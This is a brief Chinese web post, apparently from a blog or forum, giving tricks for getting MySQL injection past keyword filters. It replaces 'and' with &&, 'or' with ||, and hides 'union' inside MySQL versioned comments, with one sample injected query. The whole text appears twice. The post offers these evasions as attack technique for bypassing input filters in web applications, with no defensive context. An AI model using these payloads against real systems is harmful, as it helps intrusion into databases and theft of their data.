mysql注入对and or的过滤及uinon select等过滤的一个方法
1.and 用&& 代替
2. or 用||代替
3.union select from 变成 /*!union*/这种。
一个例子:
/ select 1 /*!union*/ select 2 from adad where 1&&1
互联网爱好者
互联网爱好者
1.and 用&& 代替
2. or 用||代替
3.union select from 变成 /*!union*/这种。
一个例子:
/ select 1 /*!union*/ select 2 from adad where 1&&1